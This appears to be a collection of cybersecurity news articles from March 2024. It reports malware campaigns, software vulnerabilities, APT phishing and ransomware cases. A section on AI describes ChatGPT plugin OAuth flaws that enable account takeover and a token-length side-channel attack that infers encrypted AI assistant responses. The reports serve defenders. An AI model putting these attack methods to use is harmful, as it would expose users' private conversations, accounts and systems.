"The malware payloads used in the DEEP#GOSU represent a sophisticated, multi-stage threat designed to operate stealthily on Windows systems especially from a network-monitoring standpoint," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical analysis shared with The Hacker News.
"Its capabilities included keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration, and persistence using both RAT software for full remote access, scheduled tasks as well as self-executing PowerShell scripts using jobs."
A notable aspect of the infection procedure is that it leverages legitimate services such as Dropbox or Google Docs for command-and-control (C2), thus allowing the threat actor to blend undetected into regular network traffic.
On top of that, the use of such cloud services to stage the payloads allows for updating the functionality of the malware or delivering additional modules.
The starting point is said to be a malicious email attachment containing a ZIP archive with a rogue shortcut file (.LNK) that masquerades as a PDF file ("IMG_20240214_0001.pdf.lnk").
The .LNK file comes embedded with a PowerShell script as well as a decoy PDF document, with the former also reaching out to an actor-controlled Dropbox infrastructure to retrieve and execute another PowerShell script ("ps.bin").
The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly file in binary form that's actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT) with capabilities to record keystrokes, manage files, and facilitate remote control.
It's worth noting that Kimsuky has employed TruRat in at least two campaigns uncovered by the AhnLab Security Intelligence Center (ASEC) last year.
Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x").
The VBScript is also designed to use Windows Management Instrumentation (WMI) to execute commands on the system, and set up scheduled tasks on the system for persistence.
Another noteworthy aspect of the VBScript is the use of Google Docs to
dynamically retrieve configuration data for the Dropbox connection, allowing the
threat actor to change the account information without having to alter the
script itself.
The PowerShell script downloaded as a result is equipped to gather extensive information about the system and exfiltrate the details via a POST request to Dropbox.
"The purpose of this script appears to be designed to serve as a tool for periodic communication with a command-and-control (C2) server via Dropbox," the researchers said. "Its main purposes include encrypting and exfiltrating or downloading data."
In other words, it acts as a backdoor to control the compromised hosts and continuously keep a log of user activity, including keystrokes, clipboard content, and the foreground window.
The development comes as security researcher Ovi Liber detailed North Korea-linked ScarCruft's embedding of malicious code within Hangul Word Processor (HWP) lure documents present in phishing emails to distribute malware like RokRAT.
"The email contains a HWP Doc which has an embedded OLE object in the form of a
BAT script," Liber said. "Once the user clicks on the OLE object, the BAT script
executes which in turn creates a PowerShell-based reflective DLL injection
attack on the victims machine."
It also follows Andariel's exploitation of a legitimate remote desktop solution called MeshAgent to install malware like AndarLoader and ModeLoader, a JavaScript malware meant for command execution.
"This is the first confirmed use of a MeshAgent by the Andariel group," ASEC said. "The Andariel group has been continuously abusing the asset management solutions of domestic companies to distribute malware in the process of lateral movement, starting with Innorix Agent in the past."
Andariel, also known by the names Nicket Hyatt or Silent Chollima, is a sub-cluster within the notorious Lazarus Group, actively orchestrating attacks for both cyber espionage and financial gain.
The prolific state-sponsored threat actor has since been observed laundering a chunk of the crypto assets stolen from the hack of crypto exchange HTX and its cross-chain bridge (aka HECO Bridge) through Tornado Cash. The breach led to the theft of $112.5 million in cryptocurrency in November 2023.
"Following common crypto-laundering patterns, the stolen tokens were immediately swapped for ETH, using decentralized exchanges," Elliptic said. "The stolen funds then lay dormant until March 13, 2024, when the stolen crypto assets began to be sent through Tornado Cash."
The blockchain analytics firm said that Tornado Cash's continuation of its operations despite sanctions have likely made it an attractive proposition for the Lazarus Group to conceal its transaction trail following the shutdown of Sinbad in November 2023.
"The mixer operates through smart contracts running on decentralized blockchains, so it cannot be seized and shut down in the same way that centralized mixers such as Sinbad.io have been," it noted.
Fortra Patches Critical RCE Vulnerability in FileCatalyst Transfer Tool
18.3.24
Vulnerebility
The Hacker News
Fortra has released details of a
now-patched critical security flaw impacting its FileCatalyst file transfer
solution that could allow unauthenticated attackers to gain remote code
execution on susceptible servers.
Tracked as CVE-2024-25153, the shortcoming carries a CVSS score of 9.8 out of a maximum of 10.
"A directory traversal within the 'ftpservlet' of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended 'uploadtemp' directory with a specially crafted POST request," the company said in an advisory last week.
"In situations where a file is successfully uploaded to web portal's DocumentRoot, specially crafted JSP files could be used to execute code, including web shells."
The vulnerability, the company said, was first reported on August 9, 2023, and addressed two days later in FileCatalyst Workflow version 5.1.6 Build 114 without a CVE identifier. Fortra was authorized as a CVE Numbering Authority (CNA) in early December 2023.
Security researcher Tom Wedgbury of LRQA Nettitude has been credited with discovering and reporting the flaw. The company has since released a full proof-of-concept (PoC) exploit, describing how the flaw could be weaponized to upload a web shell and execute arbitrary system commands.
Also resolved by Fortra in January 2024 are two other security vulnerabilities in FileCatalyst Direct (CVE-2024-25154 and CVE-2024-25155) that could lead to information leakage and code execution.
With previously disclosed flaws in Fortra GoAnywhere managed file transfer (MFT) coming under heavy exploitation last year by threat actors like Cl0p, it's recommended that users have applied the necessary updates to mitigate potential threats.
Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
18.3.24
Virus
The Hacker News
Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.
"It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website," Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.
The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with an intent to collect sensitive data for selling them in underground forums.
AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It's typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.
Once installed, it's capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.
The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.
HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by "smuggling" an encoded malicious script.
Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and extracts the payload on the host device, effectively bypassing typical security controls such as email gateways that are known to only inspect for suspicious attachments.
The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.
The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement, launching which kicks off a series of actions to execute a series of intermediate batch and PowerShell scripts from an already compromised domain.
One of the PowerShell scripts ("agent3.ps1") is designed to fetch the AZORult loader ("service.exe"), which, in turn, downloads and executes another PowerShell script ("sd2.ps1") containing the stealer malware.
"It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts," Michael Alcantara said. "It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender."
"Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate."
The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.
AutoSmuggle "takes a file such as an exe or an archive and 'smuggles' it into the SVG or HTML file so that when the SVG or HTML file is opened, the 'smuggled' file is delivered," the company explained.
Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.
"The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns," SonicWall disclosed last week.
In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.
That's not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.
Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of the remote access trojans like AsyncRAT, njRAT, and Remcos.
WordPress Admins Urged to Remove miniOrange Plugins Due to Critical Flaw
18.3.24
Vulnerebility
The Hacker News
WordPress users of miniOrange's
Malware Scanner and Web Application Firewall plugins are being urged to delete
them from their websites following the discovery of a critical security flaw.
The flaw, tracked as CVE-2024-2172, is rated 9.8 out of a maximum of 10 on the CVSS scoring system and discovered by Stiofan. It impacts the following versions of the two plugins -
Malware Scanner (versions <= 4.7.2)
Web Application Firewall (versions <=
2.1.1)
It's worth noting that the plugins have been permanently closed by the
maintainers as of March 7, 2024. While Malware Scanner has over 10,000 active
installs, Web Application Firewall has more than 300 active installations.
"This vulnerability makes it possible for an unauthenticated attacker to grant themselves administrative privileges by updating the user password," Wordfence reported last week.
The issue is the result of a missing capability check in the function mo_wpns_init() that enables an unauthenticated attacker to arbitrarily update any user's password and escalate their privileges to that of an administrator, potentially leading to a complete compromise of the site.
"Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would," Wordfence said.
"This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modify posts and pages which can be leveraged to redirect site users to other malicious sites or inject spam content."
The development comes as the WordPress security company warned of a similar high-severity privilege escalation flaw in the RegistrationMagic plugin (CVE-2024-1991, CVSS score: 8.8) affecting all versions, including and prior to 5.3.0.0.
The issue, addressed on March 11, 2024, with the release of version 5.3.1.0, permits an authenticated attacker to grant themselves administrative privileges by updating the user role. The plugin has more than 10,000 active installations.
"This vulnerability allows authenticated threat actors with subscriber-level permissions or higher to elevate their privileges to that of a site administrator which could ultimately lead to complete site compromise," István Márton said.
APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing
Scheme
18.3.24
APT
The Hacker News
The Russia-linked threat actor
known as APT28 has been linked to multiple ongoing phishing campaigns that
employ lure documents imitating government and non-governmental organizations
(NGOs) in Europe, the South Caucasus, Central Asia, and North and South America.
"The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production," IBM X-Force said in a report published last week.
The tech company is tracking the activity under the moniker ITG05, which is also known as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Pawn Storm, Sednit, Sofacy, TA422, and UAC-028.
The disclosure comes more than three months after the adversary was spotted using decoys related to the ongoing Israel-Hamas war to deliver a custom backdoor dubbed HeadLace.
APT28 has since also targeted Ukrainian government entities and Polish organizations with phishing messages designed to deploy bespoke implants and information stealers like MASEPIE, OCEANMAP, and STEELHOOK.
Other campaigns have entailed the exploitation of security flaws in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) to plunder NT LAN Manager (NTLM) v2 hashes, raising the possibility that the threat actor may leverage other weaknesses to exfiltrate NTLMv2 hashes for use in relay attacks.
The latest campaigns observed by IBM X-Force between late November 2023 and
February 2024 leverage the "search-ms:" URI protocol handler in Microsoft
Windows to trick victims into downloading malware hosted on actor-controlled
WebDAV servers.
There is evidence to suggest that both the WebDAV servers, as well as the MASEPIE C2 servers, may be hosted on compromised Ubiquiti routers, a botnet comprising which was taken down by the U.S. government last month.
The phishing attacks impersonate entities from several countries such as Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the U.S., putting to use a mix of authentic publicly available government and non-government lure documents to activate the infection chains.
"In an update to their methodologies, ITG05 is utilizing the freely available hosting provider, firstcloudit[.]com to stage payloads to enable ongoing operations," security researchers Joe Fasulo, Claire Zaboeva, and Golo Mühr said.
The climax of APT28's elaborate scheme ends with the execution of MASEPIE, OCEANMAP, and STEELHOOK, which are designed to exfiltrate files, run arbitrary commands, and steal browser data. OCEANMAP has been characterized as a more capable version of CredoMap, another backdoor previously identified as used by the group.
"ITG05 remains adaptable to changes in opportunity by delivering new infection methodologies and leveraging commercially available infrastructure, while consistently evolving malware capabilities," the researchers concluded.
Hackers Using Cracked Software on GitHub to Spread RisePro Info Stealer
17.3.24
Virus
The Hacker News
Cybersecurity researchers have found a number of GitHub repositories offering cracked software that are used to deliver an information stealer called RisePro.
The campaign, codenamed gitgub, includes 17 repositories associated with 11 different accounts, according to G DATA. The repositories in question have since been taken down by the Microsoft-owned subsidiary.
"The repositories look similar, featuring a README.md file with the promise of free cracked software," the German cybersecurity company said.
"Green and red circles are commonly used on Github to display the status of automatic builds. Gitgub threat actors added four green Unicode circles to their README.md that pretend to display a status alongside a current date and provide a sense of legitimacy and recency."
The list of repositories is as follows, with each of them pointing to a download link ("digitalxnetwork[.]com") containing a RAR archive file -
andreastanaj/AVAST
andreastanaj/Sound-Booster
aymenkort1990/fabfilter
BenWebsite/-IObit-Smart-Defrag-Crack
Faharnaqvi/VueScan-Crack
javisolis123/Voicemod
lolusuary/AOMEI-Backupper
lolusuary/Daemon-Tools
lolusuary/EaseUS-Partition-Master
lolusuary/SOOTHE-2
mostofakamaljoy/ccleaner
rik0v/ManyCam
Roccinhu/Tenorshare-Reiboot
Roccinhu/Tenorshare-iCareFone
True-Oblivion/AOMEI-Partition-Assistant
vaibhavshiledar/droidkit
vaibhavshiledar/TOON-BOOM-HARMONY
The RAR
archive, which requires the victims to supply a password mentioned in the
repository's README.md file, contains an installer file, which unpacks the
next-stage payload, an executable file that's inflated to 699 MB in an effort to
crash analysis tools like IDA Pro.
The actual contents of the file – amounting to a mere 3.43 MB – act as a loader to inject RisePro (version 1.6) into either AppLaunch.exe or RegAsm.exe.
RisePro burst into the spotlight in late 2022 when it was distributed using a pay-per-install (PPI) malware downloader service known as PrivateLoader.
Written in C++, it's designed to gather sensitive information from infected hosts and exfiltrate it to two Telegram channels, which are often used by threat actors to extract victims' data. Interestingly, recent research from Checkmarx showed that it's possible to infiltrate and forward messages from an attacker's bot to another Telegram account.
The development comes as Splunk detailed the tactics and techniques adopted by Snake Keylogger, describing it as a stealer malware that "employs a multifaceted approach to data exfiltration."
"The use of FTP facilitates the secure transfer of files, while SMTP enables the sending of emails containing sensitive information," Splunk said. "Additionally, integration with Telegram offers a real-time communication platform, allowing for immediate transmission of stolen data."
Stealer malware have become increasingly popular, often becoming the primary vector for ransomware and other high impact data breaches. According to a report from Specops published this week, RedLine, Vidar, and Raccoon have emerged as the most widely-used stealers, with RedLine alone accounting for the theft of more than 170.3 million passwords in the last six months.
"The current rise of information-stealing malware is a stark reminder of constantly evolving digital threats," Flashpoint noted in January 2024. "While the motivations behind its use is almost always rooted in financial gain, stealers are continually adapting while being more accessible and easier to use."
GhostRace – New Data Leak Vulnerability Affects Modern CPUs
16.3.24
Vulnerebility
The Hacker News
A group of researchers has discovered a new data leakage attack impacting modern CPU architectures supporting speculative execution.
Dubbed GhostRace (CVE-2024-2193), it is a variation of the transient execution CPU vulnerability known as Spectre v1 (CVE-2017-5753). The approach combines speculative execution and race conditions.
"All the common synchronization primitives implemented using conditional branches can be microarchitecturally bypassed on speculative paths using a branch misprediction attack, turning all architecturally race-free critical regions into Speculative Race Conditions (SRCs), allowing attackers to leak information from the target," the researchers said.
The findings from the Systems Security Research Group at IBM Research Europe and VUSec, the latter of which disclosed another side-channel attack called SLAM targeting modern processors in December 2023.
Spectre refers to a class of side-channel attacks that exploit branch prediction and speculative execution on modern CPUs to read privileged data in the memory, bypassing isolation protections between applications.
While speculative execution is a performance optimization technique used by most CPUs, Spectre attacks take advantage of the fact that erroneous predictions leave behind traces of memory accesses or computations in the processor's caches.
"Spectre attacks induce a victim to speculatively perform operations that would not occur during strictly serialized in-order processing of the program's instructions, and which leak victim's confidential information via a covert channel to the adversary," the researchers behind the Spectre attack noted in January 2018.
What makes GhostRace notable is that it enables an unauthenticated attacker to extract arbitrary data from the processor using race conditions to access the speculative executable code paths by leveraging what's called a Speculative Concurrent Use-After-Free (SCUAF) attack.
A race condition is an undesirable situation that occurs when two or more processes attempt to access the same, shared resource without proper synchronization, thereby leading to inconsistent results and opening a window of opportunity for an attacker to perform malicious actions.
"In characteristics and exploitation strategy, an SRC vulnerability is similar to a classic race condition," the CERT Coordination Center (CERT/CC) explained in an advisory.
"However, it is different in that the attacker exploits said race condition on a transiently executed path originating from a mis-speculated branch (similar to Spectre v1), targeting a racy code snippet or gadget that ultimately discloses information to the attacker."
The net result is that it permits an attacker with access to CPU resources to access arbitrary sensitive data from host memory.
"Any software, e.g., operating system, hypervisor, etc., implementing synchronization primitives through conditional branches without any serializing instruction on that path and running on any microarchitecture (e.g., x86, ARM, RISC-V, etc.), which allows conditional branches to be speculatively executed, is vulnerable to SRCs," VUSec said.
Following responsible disclosure, AMD said its existing guidance for Spectre "remains applicable to mitigate this vulnerability." The maintainers of the Xen open-source hypervisor acknowledged that all versions are impacted, although they said it's unlikely to pose a serious security threat.
"Out of caution, the Xen Security Team have provided hardening patches including the addition of a new LOCK_HARDEN mechanism on x86 similar to the existing BRANCH_HARDEN," Xen said.
"LOCK_HARDEN is off by default, owing to the uncertainty of there being a vulnerability under Xen, and uncertainty over the performance impact. However, we expect more research to happen in this area, and feel it is prudent to have a mitigation in place."
Third-Party ChatGPT Plugins Could Lead to Account Takeovers
15.3.24
AI
The Hacker News
Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT could act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data.
According to new research published by Salt Labs, security flaws found directly in ChatGPT and within the ecosystem could allow attackers to install malicious plugins without users' consent and hijack accounts on third-party websites like GitHub.
ChatGPT plugins, as the name implies, are tools designed to run on top of the large language model (LLM) with the aim of accessing up-to-date information, running computations, or accessing third-party services.
OpenAI has since also introduced GPTs, which are bespoke versions of ChatGPT tailored for specific use cases, while reducing third-party service dependencies. As of March 19, 2024, ChatGPT users will no longer be able to install new plugins or create new conversations with existing plugins.
One of the flaws unearthed by Salt Labs involves exploiting the OAuth workflow to trick a user into installing an arbitrary plugin by taking advantage of the fact that ChatGPT doesn't validate that the user indeed started the plugin installation.
This effectively could allow threat actors to intercept and exfiltrate all data shared by the victim, which may contain proprietary information.
The cybersecurity firm also unearthed issues with PluginLab that could be weaponized by threat actors to conduct zero-click account takeover attacks, allowing them to gain control of an organization's account on third-party websites like GitHub and access their source code repositories.
"'auth.pluginlab[.]ai/oauth/authorized' does not authenticate the request, which means that the attacker can insert another memberId (aka the victim) and get a code that represents the victim," security researcher Aviad Carmel explained. "With that code, he can use ChatGPT and access the GitHub of the victim."
The memberId of the victim can be obtained by querying the endpoint "auth.pluginlab[.]ai/members/requestMagicEmailCode." There is no evidence that any user data has been compromised using the flaw.
Also discovered in several plugins, including Kesem AI, is an OAuth redirection manipulation bug that could permit an attacker to steal the account credentials associated with the plugin itself by sending a specially crafted link to the victim.
The development comes weeks after Imperva detailed two cross-site scripting (XSS) vulnerabilities in ChatGPT that could be chained to seize control of any account.
In December 2023, security researcher Johann Rehberger demonstrated how malicious actors could create custom GPTs that can phish for user credentials and transmit the stolen data to an external server.
New Remote Keylogging Attack on AI Assistants#
"LLMs generate and send responses as a series of tokens (akin to words), with
each token transmitted from the server to the user as it is generated," a group
of academics from the Ben-Gurion University and Offensive AI Research Lab said.
"While this process is encrypted, the sequential token transmission exposes a
new side-channel: the token-length side-channel. Despite encryption, the size of
the packets can reveal the length of the tokens, potentially allowing attackers
on the network to infer sensitive and confidential information shared in private
AI assistant conversations."
This is accomplished by means of a token inference attack that's designed to
decipher responses in encrypted traffic by training an LLM model capable of
translating token-length sequences into their natural language sentential
counterparts (i.e., plaintext).
In other words, the core idea is to intercept the real-time chat responses with
an LLM provider, use the network packet headers to infer the length of each
token, extract and parse text segments, and leverage the custom LLM to infer the
response.
To counteract the effectiveness of the side-channel attack, it's recommended
that companies that develop AI assistants apply random padding to obscure the
actual length of tokens, transmit tokens in larger groups rather than
individually, and send complete responses at once, instead of in a
token-by-token fashion.
"Balancing security with usability and performance presents a complex challenge
that requires careful consideration," the researchers concluded.
The findings also follow new
research published this week about an LLM side-channel attack that employs
token-length as a covert means to extract encrypted responses from AI Assistants
over the web.
Two key prerequisites to pulling off the attack are an AI chat client running in
streaming mode and an adversary who is capable of capturing network traffic
between the client and the AI chatbot.
Google Introduces Enhanced Real-Time URL Protection for Chrome Users
15.3.24
Security
The Hacker News
Google on Thursday announced an
enhanced version of Safe Browsing to provide real-time, privacy-preserving URL
protection and safeguard users from visiting potentially malicious sites.
"The Standard protection mode for Chrome on desktop and iOS will check sites against Google's server-side list of known bad sites in real-time," Google's Jonathan Li and Jasika Bawa said.
"If we suspect a site poses a risk to you or your device, you'll see a warning with more information. By checking sites in real time, we expect to block 25% more phishing attempts."
Up until now, the Chrome browser used a locally-stored list of known unsafe sites that's updated every 30 to 60 minutes, and then leveraging a hash-based approach to compare every site visited against the database.
Google first revealed its plans to switch to real-time server-side checks without sharing users' browsing history with the company in September 2023.
The reason for the change, the search giant said, is motivated by the fact that the list of harmful websites is growing at a rapid pace and that 60% of the phishing domains exist for less than 10 minutes, making them difficult to block.
"Not all devices have the resources necessary to maintain this growing list, nor are they always able to receive and apply updates to the list at the frequency necessary to benefit from full protection," it added.
Thus, with the new architecture, every time a user attempts to visit a website, the URL is checked against the browser's global and local caches containing known safe URLs and the results of previous Safe Browsing checks in order to determine the site's status.
Should the visited URL be absent from the caches, a real-time check is performed
by obfuscating the URL into 32-byte full hashes, which are then truncated into
4-byte long hash prefixes, encrypted, and sent to a privacy server.
"The privacy server removes potential user identifiers and forwards the encrypted hash prefixes to the Safe Browsing server via a TLS connection that mixes requests with many other Chrome users," Google explained.
The Safe Browsing server subsequently decrypts the hash prefixes and matches them against the server-side database to return full hashes of all unsafe URLs that match one of the hash prefixes sent by the browser.
Finally, on the client side, the full hashes are compared against the full hashes of the visited URL, and a warning message is displayed if a match is found.
Google also confirmed that the privacy server is nothing but an Oblivious HTTP (OHTTP) relay operated by Fastly that sits between Chrome and the Safe Browsing server to prevent the latter from access users' IP addresses, thereby preventing it from correlating the URL checks with a user's internet browsing history.
"Ultimately, Safe Browsing sees the hash prefixes of your URL but not your IP address, and the privacy server sees your IP address but not the hash prefixes," the company emphasized. "No single party has access to both your identity and the hash prefixes. As such, your browsing activity remains private."
Malicious Ads Targeting Chinese Users with Fake Notepad++ and VNote Installers
15.3.24
Virus
The Hacker News
Chinese users looking for legitimate software such as Notepad++ and VNote on search engines like Baidu are being targeted with malicious ads and bogus links to distribute trojanized versions of the software and ultimately deploy Geacon, a Golang-based implementation of Cobalt Strike.
"The malicious site found in the notepad++ search is distributed through an advertisement block," Kaspersky researcher Sergey Puzan said.
"Opening it, an attentive user will immediately notice an amusing inconsistency: the website address contains the line vnote, the title offers a download of Notepad‐‐ (an analog of Notepad++, also distributed as open-source software), while the image proudly shows Notepad++. In fact, the packages downloaded from here contain Notepad‐‐."
The website, named vnote.fuwenkeji[.]cn, contains download links to Windows, Linux, and macOS versions of the software, with the link to the Windows variant pointing to the official Gitee repository containing the Notepad-- installer ("Notepad--v2.10.0-plugin-Installer.exe").
The Linux and macOS versions, on the other hand, lead to malicious installation packages hosted on vnote-1321786806.cos.ap-hongkong.myqcloud[.]com.
In a similar fashion, the fake look-alike websites for VNote ("vnote[.]info" and
"vnotepad[.]com") lead to the same set of myqcloud[.]com links, in this case,
also pointing to a Windows installer hosted on the domain. That said, the links
to the potentially malicious versions of VNote are no longer active.
An analysis of the modified Notepad-- installers reveals that they are designed to retrieve a next-stage payload from a remote server, a backdoor that exhibits similarities with Geacon.
It's capable of creating SSH connections, performing file operations, enumerating processes, accessing clipboard content, executing files, uploading and downloading files, taking screenshots, and even entering into sleep mode. Command-and-control (C2) is facilitated by means of HTTPS protocol.
The development comes as malvertising campaigns have also acted as a conduit for other malware such as FakeBat (aka EugenLoader) malware with the help of MSIX installer files masquerading as Microsoft OneNote, Notion, and Trello.
LockBit Ransomware Hacker Ordered to Pay $860,000 After Guilty Plea in Canada
14.3.24
Cyber
The Hacker News
A 34-year-old Russian-Canadian
national has been sentenced to nearly four years in jail in Canada for his
participation in the LockBit global ransomware operation.
Mikhail Vasiliev, an Ontario resident, was originally arrested in November 2022 and charged by the U.S. Department of Justice (DoJ) with "conspiring with others to intentionally damage protected computers and to transmit ransom demands in connection with doing so."
News of Vasiliev's jail term was first reported by CTV News.
The defendant, who had his home searched by Canadian law enforcement authorities in August and October 2022, is said to have kept a list of "prospective or historical" victims and screenshots of communications exchanged with "LockBitSupp" on the Tox messaging platform.
The raid also uncovered a text file with instructions to deploy LockBit ransomware, the ransomware source code, and a control panel used by the e-crime group to deliver the file-locking malware.
Vasiliev, according to CTV News, pleaded guilty to eight counts of cyber extortion, mischief, and weapons charges last month. During the sentencing, he was characterized by Justice Michelle Fuerst as a "cyber terrorist" who was "motivated by his own greed."
He is believed to have become a cyber criminal while at home during the COVID-19 pandemic, attempting to seek ransom payments from three Canadian companies between 2021 and 2022 by stealing their data and holding it hostage.
Vasiliev, who has consented to being extradited to the U.S., has also been ordered to pay back more than $860,000 in restitution.
One of the most prolific ransomware groups in history, LockBit suffered a huge blow in February 2024, when its infrastructure was seized in a coordinated law enforcement operation. The disruption was accompanied by arrests of three LockBit affiliates in Poland and Ukraine.
Although the group reemerged with a new data leak site, there is evidence to suggest that the new victims being listed are either old or fake, designed to give an impression that the group is back up and running.
The development arrives as a federal jury in Washington, D.C., convicted Roman Sterlingov, a dual Russian-Swedish national, for his operation of Bitcoin Fog from 2011 through 2021, facilitating the laundering of profits made from the sale of illegal narcotics, computer crimes, stolen identities, and child sexual abuse material.
Ilya Lichtenstein, who pleaded guilty in August 2023 to the theft of about 120,000 bitcoin in connection to the hack of the Bitfinex cryptocurrency exchange, testified last month how he had used Bitcoin Fog 10 times to launder the virtual assets, Bloomberg reported.
"Bitcoin Fog was the longest-running cryptocurrency 'mixer,' gaining notoriety as a go-to money laundering service for criminals seeking to hide their illicit proceeds from law enforcement," the DoJ said.
"Over the course of its decade-long operation, Bitcoin Fog moved over 1.2 million bitcoin, which was valued at approximately $400 million at the time of the transactions."
Researchers Detail Kubernetes Vulnerability That Enables Windows Node Takeover
14.3.24
Vulnerebility
The Hacker News
Details have been made public about
a now-patched high-severity flaw in Kubernetes that could allow a malicious
attacker to achieve remote code execution with elevated privileges under
specific circumstances.
"The vulnerability allows remote code execution with SYSTEM privileges on all Windows endpoints within a Kubernetes cluster," Akamai security researcher Tomer Peled said. "To exploit this vulnerability, the attacker needs to apply malicious YAML files on the cluster."
Tracked as CVE-2023-5528 (CVSS score: 7.2), the shortcoming impacts all versions of kubelet, including and after version 1.8.0. It was addressed as part of updates released on November 14, 2023, in the following versions -
kubelet v1.28.4
kubelet v1.27.8
kubelet v1.26.11, and
kubelet v1.25.16
"A security issue was discovered in Kubernetes where a user that can create pods
and persistent volumes on Windows nodes may be able to escalate to admin
privileges on those nodes," Kubernetes maintainers said in an advisory released
at the time. "Kubernetes clusters are only affected if they are using an in-tree
storage plugin for Windows nodes."
Successful exploitation of the flaw could result in a complete takeover of all Windows nodes in a cluster. It's worth noting that another set of similar flaws was previously disclosed by the web infrastructure company in September 2023.
The issue stems from the use of "insecure function call and lack of user input sanitization," and relates to feature called Kubernetes volumes, specially leveraging a volume type known as local volumes that allow users to mount disk partition in a pod by specifying or creating a PersistentVolume.
"While creating a pod that includes a local volume, the kubelet service will (eventually) reach the function 'MountSensitive(),'" Peled explained. "Inside it, there's a cmd line call to 'exec.command,' which makes a symlink between the location of the volume on the node and the location inside the pod."
This provides a loophole that an attacker can exploit by creating a PersistentVolume with a specially crafted path parameter in the YAML file, which triggers command injection and execution by using the "&&" command separator.
"In an effort to remove the opportunity for injection, the Kubernetes team chose to delete the cmd call, and replace it with a native GO function that will perform the same operation 'os.Symlink()," Peled said of the patch put in place.
The disclosure comes as a critical security flaw discovered in the end-of-life (EoL) Zhejiang Uniview ISC camera model 2500-S (CVE-2024-0778, CVSS score: 9.8) is being exploited by threat actors to drop a Mirai botnet variant called NetKiller that shares infrastructure overlaps with a different botnet named Condi.
"The Condi botnet source code was released publicly on Github between August 17 and October 12, 2023," Akamai said. "Considering the Condi source code has been available for months now, it is likely that other threat actors [...] are using it."
RedCurl Cybercrime Group Abuses Windows PCA Tool for Corporate Espionage
14.3.24
BigBrothers
The Hacker News
The Russian-speaking cybercrime group called RedCurl is leveraging a legitimate Microsoft Windows component called the Program Compatibility Assistant (PCA) to execute malicious commands.
"The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs," Trend Micro said in an analysis published this month.
"Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities."
RedCurl, which is also called Earth Kapre and Red Wolf, is known to be active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company were targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information.
The attack chain examined by Trend Micro entails the use of phishing emails containing malicious attachments (.ISO and .IMG files) to activate a multi-stage process that starts with the use of cmd.exe to download a legitimate utility called curl from a remote server, which then acts as a channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that takes care of establishing a connection with the same domain used by curl to fetch the loader.
Also used in the attack is the use of the Impacket open-source software for unauthorized command execution.
The connections to Earth Kapre stem from overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
